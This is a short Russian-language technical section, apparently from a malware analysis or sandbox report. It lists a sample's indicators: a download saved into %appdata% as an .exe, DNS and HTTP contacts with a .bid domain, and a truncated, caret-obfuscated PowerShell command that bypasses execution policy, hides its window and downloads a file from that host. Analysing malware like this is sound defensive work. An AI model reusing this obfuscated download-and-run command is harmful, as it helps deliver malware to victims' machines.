Техническая информация
- http://asecwitlecn.bid/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "P^o^wErs^heLl.EXe -^E^Xec^U^tIOnpO^l^Ic^y B^YP^A^SS ^-N^OpROF^I^Le^ -w^Indo^w^stYLe H^i^DD^eN (NE^W-OBjECT SYS^tEM.^n^e^T^.We^bcLieN^t).^D^O^W^NLOADFI^Le^('http://asecwitlecn...
- 'as###itlecn.bid':80
- http://as###itlecn.bid/read.php?f=#####
- DNS ASK as###itlecn.bid
- '<SYSTEM32>\cmd.exe' /c "P^o^wErs^heLl.EXe -^E^Xec^U^tIOnpO^l^Ic^y B^YP^A^SS ^-N^OpROF^I^Le^ -w^Indo^w^stYLe H^i^DD^eN (NE^W-OBjECT SYS^tEM.^n^e^T^.We^bcLieN^t).^D^O^W^NLOADFI^Le^('http://asecwitlecn...' (со скрытым окном)